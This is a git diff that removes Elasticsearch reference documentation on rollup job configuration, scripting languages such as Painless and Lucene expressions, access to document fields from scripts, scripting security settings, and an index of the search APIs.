"host_names": { - "terms": { - "field": "hostname" - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Ultimately, when configuring `groups` for a job, think in terms of how you might wish to partition data in a query at a future date... -then include those in the config. Because Rollup Search allows any order or combination of the grouped fields, you just need to decide -if a field is useful for aggregating later, and how you might wish to use it (terms, histogram, etc). - -[[rollup-understanding-group-intervals]] -==== Calendar vs fixed time intervals - -Each rollup-job must have a date histogram group with a defined interval. {es} -understands both -<>. Fixed time -intervals are fairly easy to understand; `60s` means sixty seconds. But what -does `1M` mean? One month of time depends on which month we are talking about, -some months are longer or shorter than others. This is an example of calendar -time and the duration of that unit depends on context. Calendar units are also -affected by leap-seconds, leap-years, etc. - -This is important because the buckets generated by rollup are in either calendar -or fixed intervals and this limits how you can query them later. See -<>. - -We recommend sticking with fixed time intervals, since they are easier to -understand and are more flexible at query time. 
It will introduce some drift in -your data during leap-events and you will have to think about months in a fixed -quantity (30 days) instead of the actual calendar length. However, it is often -easier than dealing with calendar units at query time. - -Multiples of units are always "fixed". For example, `2h` is always the fixed -quantity `7200` seconds. Single units can be fixed or calendar depending on the -unit: - -[options="header"] -|======= -|Unit |Calendar |Fixed -|millisecond |NA |`1ms`, `10ms`, etc -|second |NA |`1s`, `10s`, etc -|minute |`1m` |`2m`, `10m`, etc -|hour |`1h` |`2h`, `10h`, etc -|day |`1d` |`2d`, `10d`, etc -|week |`1w` |NA -|month |`1M` |NA -|quarter |`1q` |NA -|year |`1y` |NA -|======= - -For some units where there are both fixed and calendar, you may need to express -the quantity in terms of the next smaller unit. For example, if you want a fixed -day (not a calendar day), you should specify `24h` instead of `1d`. Similarly, -if you want fixed hours, specify `60m` instead of `1h`. This is because the -single quantity entails calendar time, and limits you to querying by calendar -time in the future. - -==== Grouping limitations with heterogeneous indices - -There was previously a limitation in how Rollup could handle indices that had heterogeneous mappings (multiple, unrelated/non-overlapping -mappings). The recommendation at the time was to configure a separate job per data "type". For example, you might configure a separate -job for each Beats module that you had enabled (one for `process`, another for `filesystem`, etc). - -This recommendation was driven by internal implementation details that caused document counts to be potentially incorrect if a single "merged" -job was used. - -This limitation has since been alleviated. As of 6.4.0, it is now considered best practice to combine all rollup configurations -into a single job. - -As an example, if your index has two types of documents: - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "temperature": 200, - "voltage": 5.2, - "node": "a" -} --------------------------------------------------- -// NOTCONSOLE - -and - -[source,js] --------------------------------------------------- -{ - "timestamp": 1516729294000, - "price": 123, - "title": "Foo" -} --------------------------------------------------- -// NOTCONSOLE - -the best practice is to combine them into a single rollup job which covers both of these document types, like this: - -[source,js] --------------------------------------------------- -PUT _rollup/job/combined -{ - "index_pattern": "data-*", - "rollup_index": "data_rollup", - "cron": "*/30 * * * * ?", - "page_size": 1000, - "groups": { - "date_histogram": { - "field": "timestamp", - "fixed_interval": "1h", - "delay": "7d" - }, - "terms": { - "fields": [ "node", "title" ] - } - }, - "metrics": [ - { - "field": "temperature", - "metrics": [ "min", "max", "sum" ] - }, - { - "field": "price", - "metrics": [ "avg" ] - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -==== Doc counts and overlapping jobs - -There was previously an issue with document counts on "overlapping" job configurations, driven by the same internal implementation detail. -If there were two Rollup jobs saving to the same index, where one job is a "subset" of another job, it was possible that document counts -could be incorrect for certain aggregation arrangements. - -This issue has also since been eliminated in 6.4.0. 
diff --git a/docs/reference/scripting.asciidoc b/docs/reference/scripting.asciidoc deleted file mode 100644 index b081bd81c99..00000000000 --- a/docs/reference/scripting.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[modules-scripting]] -= Scripting - -[partintro] --- -With scripting, you can evaluate custom expressions in {es}. For example, you -could use a script to return "script fields" as part of a search request or -evaluate a custom score for a query. - -The default scripting language is <>. -Additional `lang` plugins enable you to run scripts written in other languages. -Everywhere a script can be used, you can include a `lang` parameter -to specify the language of the script. - -[discrete] -== General-purpose languages - -These languages can be used for any purpose in the scripting APIs, -and give the most flexibility. - -[cols="<,<,<",options="header",] -|======================================================================= -|Language - |Sandboxed - |Required plugin - -|<> - |yes - |built-in - -|======================================================================= - -[discrete] -== Special-purpose languages - -These languages are less flexible, but typically have higher performance for -certain tasks. - -[cols="<,<,<,<",options="header",] -|======================================================================= -|Language - |Sandboxed - |Required plugin - |Purpose - -|<> - |yes - |built-in - |fast custom ranking and sorting - -|<> - |yes - |built-in - |templates - -|<> - |n/a - |you write it! - |expert API - -|======================================================================= - -[WARNING] -.Scripts and security -================================================= - -Languages that are sandboxed are designed with security in mind. However, non- -sandboxed languages can be a security issue, please read -<> for more details. - -================================================= --- - -include::scripting/using.asciidoc[] - -include::scripting/fields.asciidoc[] - -include::scripting/security.asciidoc[] - -include::scripting/painless.asciidoc[] - -include::scripting/expression.asciidoc[] - -include::scripting/engine.asciidoc[] diff --git a/docs/reference/scripting/engine.asciidoc b/docs/reference/scripting/engine.asciidoc deleted file mode 100644 index 54d85e6e823..00000000000 --- a/docs/reference/scripting/engine.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ -[[modules-scripting-engine]] -== Advanced scripts using script engines - -A `ScriptEngine` is a backend for implementing a scripting language. It may also -be used to write scripts that need to use advanced internals of scripting. For example, -a script that wants to use term frequencies while scoring. - -The plugin {plugins}/plugin-authors.html[documentation] has more information on -how to write a plugin so that Elasticsearch will properly load it. To register -the `ScriptEngine`, your plugin should implement the `ScriptPlugin` interface -and override the `getScriptEngine(Settings settings)` method. - -The following is an example of a custom `ScriptEngine` which uses the language -name `expert_scripts`. It implements a single script called `pure_df` which -may be used as a search script to override each document's score as -the document frequency of a provided term. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{plugins-examples-dir}/script-expert-scoring/src/main/java/org/elasticsearch/example/expertscript/ExpertScriptPlugin.java[expert_engine] --------------------------------------------------- - -You can execute the script by specifying its `lang` as `expert_scripts`, and the name -of the script as the script source: - - -[source,console] --------------------------------------------------- -POST /_search -{ - "query": { - "function_score": { - "query": { - "match": { - "body": "foo" - } - }, - "functions": [ - { - "script_score": { - "script": { - "source": "pure_df", - "lang" : "expert_scripts", - "params": { - "field": "body", - "term": "foo" - } - } - } - } - ] - } - } -} --------------------------------------------------- -// TEST[skip:we don't have an expert script plugin installed to test this] diff --git a/docs/reference/scripting/expression.asciidoc b/docs/reference/scripting/expression.asciidoc deleted file mode 100644 index 61301fa873b..00000000000 --- a/docs/reference/scripting/expression.asciidoc +++ /dev/null @@ -1,141 +0,0 @@ -[[modules-scripting-expression]] -== Lucene expressions language - -Lucene's expressions compile a `javascript` expression to bytecode. They are -designed for high-performance custom ranking and sorting functions and are -enabled for `inline` and `stored` scripting by default. - -[discrete] -=== Performance - -Expressions were designed to have competitive performance with custom Lucene code. -This performance is due to having low per-document overhead as opposed to other -scripting engines: expressions do more "up-front". - -This allows for very fast execution, even faster than if you had written a `native` script. - -[discrete] -=== Syntax - -Expressions support a subset of javascript syntax: a single expression. - -See the https://lucene.apache.org/core/{lucene_version_path}/expressions/index.html?org/apache/lucene/expressions/js/package-summary.html[expressions module documentation] -for details on what operators and functions are available. - -Variables in `expression` scripts are available to access: - -* document fields, e.g. `doc['myfield'].value` -* variables and methods that the field supports, e.g. `doc['myfield'].empty` -* Parameters passed into the script, e.g. `mymodifier` -* The current document's score, `_score` (only available when used in a `script_score`) - -You can use Expressions scripts for `script_score`, `script_fields`, sort scripts, and numeric aggregation -scripts, simply set the `lang` parameter to `expression`. - -[discrete] -=== Numeric field API -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].value` |The value of the field, as a `double` - -|`doc['field_name'].empty` |A boolean indicating if the field has no -values within the doc. - -|`doc['field_name'].length` |The number of values in this document. - -|`doc['field_name'].min()` |The minimum value of the field in this document. - -|`doc['field_name'].max()` |The maximum value of the field in this document. - -|`doc['field_name'].median()` |The median value of the field in this document. - -|`doc['field_name'].avg()` |The average of the values in this document. - -|`doc['field_name'].sum()` |The sum of the values in this document. 
-|======================================================================= - -When a document is missing the field completely, by default the value will be treated as `0`. -You can treat it as another value instead, e.g. `doc['myfield'].empty ? 100 : doc['myfield'].value` - -When a document has multiple values for the field, by default the minimum value is returned. -You can choose a different value instead, e.g. `doc['myfield'].sum()`. - -When a document is missing the field completely, by default the value will be treated as `0`. - -Boolean fields are exposed as numerics, with `true` mapped to `1` and `false` mapped to `0`. -For example: `doc['on_sale'].value ? doc['price'].value * 0.5 : doc['price'].value` - -[discrete] -=== Date field API -Date fields are treated as the number of milliseconds since January 1, 1970 and -support the Numeric Fields API above, plus access to some date-specific fields: - -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].date.centuryOfEra`|Century (1-2920000) - -|`doc['field_name'].date.dayOfMonth`|Day (1-31), e.g. `1` for the first of the month. - -|`doc['field_name'].date.dayOfWeek`|Day of the week (1-7), e.g. `1` for Monday. - -|`doc['field_name'].date.dayOfYear`|Day of the year, e.g. `1` for January 1. - -|`doc['field_name'].date.era`|Era: `0` for BC, `1` for AD. - -|`doc['field_name'].date.hourOfDay`|Hour (0-23). - -|`doc['field_name'].date.millisOfDay`|Milliseconds within the day (0-86399999). - -|`doc['field_name'].date.millisOfSecond`|Milliseconds within the second (0-999). - -|`doc['field_name'].date.minuteOfDay`|Minute within the day (0-1439). - -|`doc['field_name'].date.minuteOfHour`|Minute within the hour (0-59). - -|`doc['field_name'].date.monthOfYear`|Month within the year (1-12), e.g. `1` for January. - -|`doc['field_name'].date.secondOfDay`|Second within the day (0-86399). - -|`doc['field_name'].date.secondOfMinute`|Second within the minute (0-59). - -|`doc['field_name'].date.year`|Year (-292000000 - 292000000). - -|`doc['field_name'].date.yearOfCentury`|Year within the century (1-100). - -|`doc['field_name'].date.yearOfEra`|Year within the era (1-292000000). -|======================================================================= - -The following example shows the difference in years between the `date` fields date0 and date1: - -`doc['date1'].date.year - doc['date0'].date.year` - -[discrete] -[[geo-point-field-api]] -=== `geo_point` field API -[cols="<,<",options="header",] -|======================================================================= -|Expression |Description -|`doc['field_name'].empty` |A boolean indicating if the field has no -values within the doc. - -|`doc['field_name'].lat` |The latitude of the geo point. - -|`doc['field_name'].lon` |The longitude of the geo point. -|======================================================================= - -The following example computes distance in kilometers from Washington, DC: - -`haversin(38.9072, 77.0369, doc['field_name'].lat, doc['field_name'].lon)` - -In this example the coordinates could have been passed as parameters to the script, -e.g. based on geolocation of the user. 
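As a sketch of how this might look in a full request (the `places` index and
`location` field are hypothetical and assumed to be mapped as `geo_point`), the
user's coordinates are supplied as named `params` and the distance is returned
as a script field:

[source,console]
--------------------------------------------------
GET /places/_search
{
  "script_fields": {
    "distance_km": {
      "script": {
        "lang": "expression",
        "source": "haversin(lat, lon, doc['location'].lat, doc['location'].lon)",
        "params": {
          "lat": 38.9072,
          "lon": 77.0369
        }
      }
    }
  }
}
--------------------------------------------------
// TEST[skip:hypothetical example using a made-up index]

Passing the coordinates as `params` means the expression itself does not need
to be recompiled for every distinct user location.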
- -[discrete] -=== Limitations - -There are a few limitations relative to other script languages: - -* Only numeric, boolean, date, and geo_point fields may be accessed -* Stored fields are not available diff --git a/docs/reference/scripting/fields.asciidoc b/docs/reference/scripting/fields.asciidoc deleted file mode 100644 index e83b54c9328..00000000000 --- a/docs/reference/scripting/fields.asciidoc +++ /dev/null @@ -1,261 +0,0 @@ -[[modules-scripting-fields]] -== Accessing document fields and special variables - -Depending on where a script is used, it will have access to certain special -variables and document fields. - -[discrete] -== Update scripts - -A script used in the <>, -<>, or <> -API will have access to the `ctx` variable which exposes: - -[horizontal] -`ctx._source`:: Access to the document <>. -`ctx.op`:: The operation that should be applied to the document: `index` or `delete`. -`ctx._index` etc:: Access to <>, some of which may be read-only. - -[discrete] -== Search and aggregation scripts - -With the exception of <> which are -executed once per search hit, scripts used in search and aggregations will be -executed once for every document which might match a query or an aggregation. -Depending on how many documents you have, this could mean millions or billions -of executions: these scripts need to be fast! - -Field values can be accessed from a script using -<>, -<>, or -<>, -each of which is explained below. - -[[scripting-score]] -[discrete] -=== Accessing the score of a document within a script - -Scripts used in the <>, -in <>, or in -<> have access to the `_score` variable which -represents the current relevance score of a document. - -Here's an example of using a script in a -<> to alter the -relevance `_score` of each document: - -[source,console] -------------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "text": "quick brown fox", - "popularity": 1 -} - -PUT my-index-000001/_doc/2?refresh -{ - "text": "quick fox", - "popularity": 5 -} - -GET my-index-000001/_search -{ - "query": { - "function_score": { - "query": { - "match": { - "text": "quick brown fox" - } - }, - "script_score": { - "script": { - "lang": "expression", - "source": "_score * doc['popularity']" - } - } - } - } -} -------------------------------------- - - -[discrete] -[[modules-scripting-doc-vals]] -=== Doc values - -By far the fastest most efficient way to access a field value from a -script is to use the `doc['field_name']` syntax, which retrieves the field -value from <>. Doc values are a columnar field value -store, enabled by default on all fields except for <>. - -[source,console] -------------------------------- -PUT my-index-000001/_doc/1?refresh -{ - "cost_price": 100 -} - -GET my-index-000001/_search -{ - "script_fields": { - "sales_price": { - "script": { - "lang": "expression", - "source": "doc['cost_price'] * markup", - "params": { - "markup": 0.2 - } - } - } - } -} -------------------------------- - -Doc-values can only return "simple" field values like numbers, dates, geo- -points, terms, etc, or arrays of these values if the field is multi-valued. -It cannot return JSON objects. - -[NOTE] -.Missing fields -=================================================== - -The `doc['field']` will throw an error if `field` is missing from the mappings. -In `painless`, a check can first be done with `doc.containsKey('field')` to guard -accessing the `doc` map. Unfortunately, there is no way to check for the -existence of the field in mappings in an `expression` script. 
- -=================================================== - -[NOTE] -.Doc values and `text` fields -=================================================== - -The `doc['field']` syntax can also be used for <> -if <> is enabled, but *BEWARE*: enabling fielddata on a -`text` field requires loading all of the terms into the JVM heap, which can be -very expensive both in terms of memory and CPU. It seldom makes sense to -access `text` fields from scripts. - -=================================================== - -[discrete] -[[modules-scripting-source]] -=== The document `_source` - -The document <> can be accessed using the -`_source.field_name` syntax. The `_source` is loaded as a map-of-maps, so -properties within object fields can be accessed as, for example, -`_source.name.first`. - -[IMPORTANT] -.Prefer doc-values to _source -========================================================= - -Accessing the `_source` field is much slower than using doc-values. The -_source field is optimised for returning several fields per result, while doc -values are optimised for accessing the value of a specific field in many -documents. - -It makes sense to use `_source` when generating a -<> for the top ten hits from a -search result but, for other search and aggregation use cases, always prefer -using doc values. -========================================================= - - -For instance: - -[source,console] -------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "first_name": { - "type": "text" - }, - "last_name": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1?refresh -{ - "first_name": "Barry", - "last_name": "White" -} - -GET my-index-000001/_search -{ - "script_fields": { - "full_name": { - "script": { - "lang": "painless", - "source": "params._source.first_name + ' ' + params._source.last_name" - } - } - } -} -------------------------------- - -[discrete] -[[modules-scripting-stored]] -=== Stored fields - -_Stored fields_ -- fields explicitly marked as -<> in the mapping -- can be accessed using the -`_fields['field_name'].value` or `_fields['field_name']` syntax: - -[source,console] -------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "full_name": { - "type": "text", - "store": true - }, - "title": { - "type": "text", - "store": true - } - } - } -} - -PUT my-index-000001/_doc/1?refresh -{ - "full_name": "Alice Ball", - "title": "Professor" -} - -GET my-index-000001/_search -{ - "script_fields": { - "name_with_title": { - "script": { - "lang": "painless", - "source": "params._fields['title'].value + ' ' + params._fields['full_name'].value" - } - } - } -} -------------------------------- - -[TIP] -.Stored vs `_source` -======================================================= - -The `_source` field is just a special stored field, so the performance is -similar to that of other stored fields. The `_source` provides access to the -original document body that was indexed (including the ability to distinguish -`null` values from empty fields, single-value arrays from plain scalars, etc). - -The only time it really makes sense to use stored fields instead of the -`_source` field is when the `_source` is very large and it is less costly to -access a few small stored fields instead of the entire `_source`. 
- -======================================================= diff --git a/docs/reference/scripting/painless.asciidoc b/docs/reference/scripting/painless.asciidoc deleted file mode 100644 index 82d886589d2..00000000000 --- a/docs/reference/scripting/painless.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ -[[modules-scripting-painless]] -== Painless scripting language - -_Painless_ is a simple, secure scripting language designed specifically for use -with Elasticsearch. It is the default scripting language for Elasticsearch and -can safely be used for inline and stored scripts. To get started with -Painless, see the {painless}/painless-guide.html[Painless Guide]. For a -detailed description of the Painless syntax and language features, see the -{painless}/painless-lang-spec.html[Painless Language Specification]. - -[[painless-features]] -You can use Painless anywhere scripts can be used in Elasticsearch. Painless -provides: - -* Fast performance: Painless scripts https://benchmarks.elastic.co/index.html#search_qps_scripts[ -run several times faster] than the alternatives. - -* Safety: Fine-grained allowlists with method call/field granularity. See the -{painless}/painless-api-reference.html[Painless API Reference] for a -complete list of available classes and methods. - -* Optional typing: Variables and parameters can use explicit types or the -dynamic `def` type. - -* Syntax: Extends a subset of Java's syntax to provide additional scripting -language features. - -* Optimizations: Designed specifically for Elasticsearch scripting. - -Ready to start scripting with Painless? See the -{painless}/painless-guide.html[Painless Guide] for the -{painless}/index.html[Painless Scripting Language]. \ No newline at end of file diff --git a/docs/reference/scripting/security.asciidoc b/docs/reference/scripting/security.asciidoc deleted file mode 100644 index 505c4db3f3f..00000000000 --- a/docs/reference/scripting/security.asciidoc +++ /dev/null @@ -1,114 +0,0 @@ -[[modules-scripting-security]] -== Scripting and security - -While Elasticsearch contributors make every effort to prevent scripts from -running amok, security is something best done in -{wikipedia}/Defense_in_depth_(computing)[layers] because -all software has bugs and it is important to minimize the risk of failure in -any security layer. Find below rules of thumb for how to keep Elasticsearch -from being a vulnerability. - -[discrete] -=== Do not run as root -First and foremost, never run Elasticsearch as the `root` user as this would -allow any successful effort to circumvent the other security layers to do -*anything* on your server. Elasticsearch will refuse to start if it detects -that it is running as `root` but this is so important that it is worth double -and triple checking. - -[discrete] -=== Do not expose Elasticsearch directly to users -Do not expose Elasticsearch directly to users, instead have an application -make requests on behalf of users. If this is not possible, have an application -to sanitize requests from users. If *that* is not possible then have some -mechanism to track which users did what. Understand that it is quite possible -to write a <> that overwhelms Elasticsearch and brings down -the cluster. All such searches should be considered bugs and the Elasticsearch -contributors make an effort to prevent this but they are still possible. - -[discrete] -=== Do not expose Elasticsearch directly to the Internet -Do not expose Elasticsearch to the Internet, instead have an application -make requests on behalf of the Internet. 
Do not entertain the thought of having -an application "sanitize" requests to Elasticsearch. Understand that it is -possible for a sufficiently determined malicious user to write searches that -overwhelm the Elasticsearch cluster and bring it down. For example: - -Good: - -* Users type text into a search box and the text is sent directly to a -<>, <>, -<>, or any of the <>. -* Running a script with any of the above queries that was written as part of -the application development process. -* Running a script with `params` provided by users. -* User actions makes documents with a fixed structure. - -Bad: - -* Users can write arbitrary scripts, queries, `_search` requests. -* User actions make documents with structure defined by users. - -[discrete] -[[modules-scripting-other-layers]] -=== Other security layers -In addition to user privileges and script sandboxing Elasticsearch uses the -https://www.oracle.com/java/technologies/javase/seccodeguide.html[Java Security Manager] -and native security tools as additional layers of security. - -As part of its startup sequence Elasticsearch enables the Java Security Manager -which limits the actions that can be taken by portions of the code. Painless -uses this to limit the actions that generated Painless scripts can take, -preventing them from being able to do things like write files and listen to -sockets. - -Elasticsearch uses -{wikipedia}/Seccomp[seccomp] in Linux, -https://www.chromium.org/developers/design-documents/sandbox/osx-sandboxing-design[Seatbelt] -in macOS, and -https://msdn.microsoft.com/en-us/library/windows/desktop/ms684147[ActiveProcessLimit] -on Windows to prevent Elasticsearch from forking or executing other processes. - -Below this we describe the security settings for scripts and how you can -change from the defaults described above. You should be very, very careful -when allowing more than the defaults. Any extra permissions weakens the total -security of the Elasticsearch deployment. - -[[allowed-script-types-setting]] -[discrete] -=== Allowed script types setting - -Elasticsearch supports two script types: `inline` and `stored` (<>). -By default, {es} is configured to run both types of scripts. -To limit what type of scripts are run, set `script.allowed_types` to `inline` or `stored`. -To prevent any scripts from running, set `script.allowed_types` to `none`. - -IMPORTANT: If you use {kib}, set `script.allowed_types` to `both` or `inline`. -Some {kib} features rely on inline scripts and do not function as expected -if {es} does not allow inline scripts. - -For example, to run `inline` scripts but not `stored` scripts, specify: - -[source,yaml] ----- -script.allowed_types: inline <1> ----- -<1> This will allow only inline scripts to be executed but not stored scripts -(or any other types). - - -[[allowed-script-contexts-setting]] -[discrete] -=== Allowed script contexts setting - -By default all script contexts are allowed to be executed. This can be modified using the -setting `script.allowed_contexts`. Only the contexts specified as part of the setting will -be allowed to be executed. To specify no contexts are allowed, set `script.allowed_contexts` -to be `none`. - -[source,yaml] ----- -script.allowed_contexts: score, update <1> ----- -<1> This will allow only scoring and update scripts to be executed but not -aggs or plugin scripts (or any other contexts). 
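Putting the two settings together, a locked-down `elasticsearch.yml` might look
like the following. This is only an illustrative sketch of one possible
combination, not a recommended baseline for every deployment:

[source,yaml]
----
# Only inline scripts may be compiled...
script.allowed_types: inline
# ...and only in the scoring and update contexts.
script.allowed_contexts: score, update
----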
diff --git a/docs/reference/scripting/using.asciidoc b/docs/reference/scripting/using.asciidoc deleted file mode 100644 index f81b7b9a642..00000000000 --- a/docs/reference/scripting/using.asciidoc +++ /dev/null @@ -1,432 +0,0 @@ -[[modules-scripting-using]] -== How to use scripts - -Wherever scripting is supported in the Elasticsearch API, the syntax follows -the same pattern: - -[source,js] -------------------------------------- - "script": { - "lang": "...", <1> - "source" | "id": "...", <2> - "params": { ... } <3> - } -------------------------------------- -// NOTCONSOLE -<1> The language the script is written in, which defaults to `painless`. -<2> The script itself which may be specified as `source` for an inline script or `id` for a stored script. -<3> Any named parameters that should be passed into the script. - -For example, the following script is used in a search request to return a -<>: - -[source,console] -------------------------------------- -PUT my-index-000001/_doc/1 -{ - "my_field": 5 -} - -GET my-index-000001/_search -{ - "script_fields": { - "my_doubled_field": { - "script": { - "lang": "expression", - "source": "doc['my_field'] * multiplier", - "params": { - "multiplier": 2 - } - } - } - } -} -------------------------------------- - -[discrete] -=== Script parameters - -`lang`:: - - Specifies the language the script is written in. Defaults to `painless`. - - -`source`, `id`:: - - Specifies the source of the script. An `inline` script is specified - `source` as in the example above. A `stored` script is specified `id` - and is retrieved from the cluster state (see <>). - - -`params`:: - - Specifies any named parameters that are passed into the script as - variables. - -[IMPORTANT] -[[prefer-params]] -.Prefer parameters -======================================== - -The first time Elasticsearch sees a new script, it compiles it and stores the -compiled version in a cache. Compilation can be a heavy process. - -If you need to pass variables into the script, you should pass them in as -named `params` instead of hard-coding values into the script itself. For -example, if you want to be able to multiply a field value by different -multipliers, don't hard-code the multiplier into the script: - -[source,js] ----------------------- - "source": "doc['my_field'] * 2" ----------------------- -// NOTCONSOLE - -Instead, pass it in as a named parameter: - -[source,js] ----------------------- - "source": "doc['my_field'] * multiplier", - "params": { - "multiplier": 2 - } ----------------------- -// NOTCONSOLE - -The first version has to be recompiled every time the multiplier changes. The -second version is only compiled once. - -If you compile too many unique scripts within a small amount of time, -Elasticsearch will reject the new dynamic scripts with a -`circuit_breaking_exception` error. For most contexts, you can compile up to 75 -scripts per 5 minutes by default. For ingest contexts, the default script -compilation rate is unlimited. You can change these settings dynamically by -setting `script.context.$CONTEXT.max_compilations_rate` eg. -`script.context.field.max_compilations_rate=100/10m`. - -======================================== - -[discrete] -[[modules-scripting-short-script-form]] -=== Short script form -A short script form can be used for brevity. In the short form, `script` is represented -by a string instead of an object. This string contains the source of the script. 
- -Short form: - -[source,js] ----------------------- - "script": "ctx._source.my-int++" ----------------------- -// NOTCONSOLE - -The same script in the normal form: - -[source,js] ----------------------- - "script": { - "source": "ctx._source.my-int++" - } ----------------------- -// NOTCONSOLE - -[discrete] -[[modules-scripting-stored-scripts]] -=== Stored scripts - -Scripts may be stored in and retrieved from the cluster state using the -`_scripts` end-point. - -If the {es} {security-features} are enabled, you must have the following -privileges to create, retrieve, and delete stored scripts: - -* cluster: `all` or `manage` - -For more information, see <>. - - -[discrete] -==== Request examples - -The following are examples of using a stored script that lives at -`/_scripts/{id}`. - -First, create the script called `calculate-score` in the cluster state: - -[source,console] ------------------------------------ -POST _scripts/calculate-score -{ - "script": { - "lang": "painless", - "source": "Math.log(_score * 2) + params.my_modifier" - } -} ------------------------------------ -// TEST[setup:my_index] - -You may also specify a context as part of the url path to compile a -stored script against that specific context in the form of -`/_scripts/{id}/{context}`: - -[source,console] ------------------------------------ -POST _scripts/calculate-score/score -{ - "script": { - "lang": "painless", - "source": "Math.log(_score * 2) + params.my_modifier" - } -} ------------------------------------ -// TEST[setup:my_index] - -This same script can be retrieved with: - -[source,console] ------------------------------------ -GET _scripts/calculate-score ------------------------------------ -// TEST[continued] - -Stored scripts can be used by specifying the `id` parameters as follows: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "script_score": { - "query": { - "match": { - "message": "some message" - } - }, - "script": { - "id": "calculate-score", - "params": { - "my_modifier": 2 - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -And deleted with: - -[source,console] ------------------------------------ -DELETE _scripts/calculate-score ------------------------------------ -// TEST[continued] - -[discrete] -[[modules-scripting-search-templates]] -=== Search templates -You can also use the `_scripts` API to store **search templates**. Search -templates save specific <> with placeholder -values, called template parameters. - -You can use stored search templates to run searches without writing out the -entire query. Just provide the stored template's ID and the template parameters. -This is useful when you want to run a commonly used query quickly and without -mistakes. - -Search templates use the https://mustache.github.io/mustache.5.html[mustache -templating language]. See <> for more information and examples. - -[discrete] -[[modules-scripting-using-caching]] -=== Script caching - -All scripts are cached by default so that they only need to be recompiled -when updates occur. By default, scripts do not have a time-based expiration, but -you can configure the size of this cache using the -`script.context.$CONTEXT.cache_expire` setting. -By default, the cache size is `100` for all contexts except the `ingest` and the -`processor_conditional` context, where it is `200`. 
- -|==== -| Context | Default Cache Size -| `ingest` | 200 -| `processor_conditional` | 200 -| default | 100 -|==== - -NOTE: The size of scripts is limited to 65,535 bytes. This can be -changed by setting `script.max_size_in_bytes` setting to increase that soft -limit, but if scripts are really large then a -<> should be considered. - -[[scripts-and-search-speed]] -=== Scripts and search speed - -Scripts can't make use of {es}'s index structures or related optimizations. This -can sometimes result in slower search speeds. - -If you often use scripts to transform indexed data, you can speed up search by -making these changes during ingest instead. However, that often means slower -index speeds. - -.*Example* -[%collapsible] -===== -An index, `my_test_scores`, contains two `long` fields: - -* `math_score` -* `verbal_score` - -When running searches, users often use a script to sort results by the sum of -these two field's values. - -[source,console] ----- -GET /my_test_scores/_search -{ - "query": { - "term": { - "grad_year": "2099" - } - }, - "sort": [ - { - "_script": { - "type": "number", - "script": { - "source": "doc['math_score'].value + doc['verbal_score'].value" - }, - "order": "desc" - } - } - ] -} ----- -// TEST[s/^/PUT my_test_scores\n/] - -To speed up search, you can perform this calculation during ingest and index the -sum to a field instead. - -First, <>, `total_score`, to the index. The -`total_score` field will contain sum of the `math_score` and `verbal_score` -field values. - -[source,console] ----- -PUT /my_test_scores/_mapping -{ - "properties": { - "total_score": { - "type": "long" - } - } -} ----- -// TEST[continued] - -Next, use an <> containing the -<> processor to calculate the sum of `math_score` and -`verbal_score` and index it in the `total_score` field. - -[source,console] ----- -PUT _ingest/pipeline/my_test_scores_pipeline -{ - "description": "Calculates the total test score", - "processors": [ - { - "script": { - "source": "ctx.total_score = (ctx.math_score + ctx.verbal_score)" - } - } - ] -} ----- -// TEST[continued] - -To update existing data, use this pipeline to <> any -documents from `my_test_scores` to a new index, `my_test_scores_2`. - -[source,console] ----- -POST /_reindex -{ - "source": { - "index": "my_test_scores" - }, - "dest": { - "index": "my_test_scores_2", - "pipeline": "my_test_scores_pipeline" - } -} ----- -// TEST[continued] - -Continue using the pipeline to index any new documents to `my_test_scores_2`. - -[source,console] ----- -POST /my_test_scores_2/_doc/?pipeline=my_test_scores_pipeline -{ - "student": "kimchy", - "grad_year": "2099", - "math_score": 800, - "verbal_score": 800 -} ----- -// TEST[continued] - -These changes may slow indexing but allow for faster searches. Users can now -sort searches made on `my_test_scores_2` using the `total_score` field instead -of using a script. - -[source,console] ----- -GET /my_test_scores_2/_search -{ - "query": { - "term": { - "grad_year": "2099" - } - }, - "sort": [ - { - "total_score": { - "order": "desc" - } - } - ] -} ----- -// TEST[continued] - -//// -[source,console] ----- -DELETE /_ingest/pipeline/my_test_scores_pipeline ----- -// TEST[continued] - -[source,console-result] ----- -{ -"acknowledged": true -} ----- -//// -===== - -We recommend testing and benchmarking any indexing changes before deploying them -in production. - -[discrete] -[[modules-scripting-errors]] -=== Script errors -Elasticsearch returns error details when there is a compliation or runtime -exception. 
The contents of this response are useful for tracking down the -problem. - -experimental[] - -The contents of `position` are experimental and subject to change. diff --git a/docs/reference/search.asciidoc b/docs/reference/search.asciidoc deleted file mode 100644 index c753dbd6e28..00000000000 --- a/docs/reference/search.asciidoc +++ /dev/null @@ -1,85 +0,0 @@ -[[search]] -== Search APIs - -Search APIs are used to search and aggregate data stored in {es} indices and -data streams. For an overview and related tutorials, see <>. - -Most search APIs support <>, with the -exception of the <>. - -[discrete] -[[core-search-apis]] -=== Core search - -* <> -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-testing-apis]] -=== Search testing - -* <> -* <> -* <> -* <> -* <> -* <> - -[discrete] -[[search-template-apis]] -=== Search templates - -* <> -* <> - -[discrete] -[[eql-search-apis]] -=== EQL search - -For an overview of EQL and related tutorials, see <>. - -* <> -* <> -* <> - - -include::search/search.asciidoc[] - -include::search/async-search.asciidoc[] - -include::search/point-in-time-api.asciidoc[] - -include::search/scroll-api.asciidoc[] - -include::search/clear-scroll-api.asciidoc[] - -include::search/search-template.asciidoc[] - -include::search/search-shards.asciidoc[] - -include::search/suggesters.asciidoc[] - -include::search/multi-search.asciidoc[] - -include::eql/eql-search-api.asciidoc[] - -include::eql/get-async-eql-search-api.asciidoc[] - 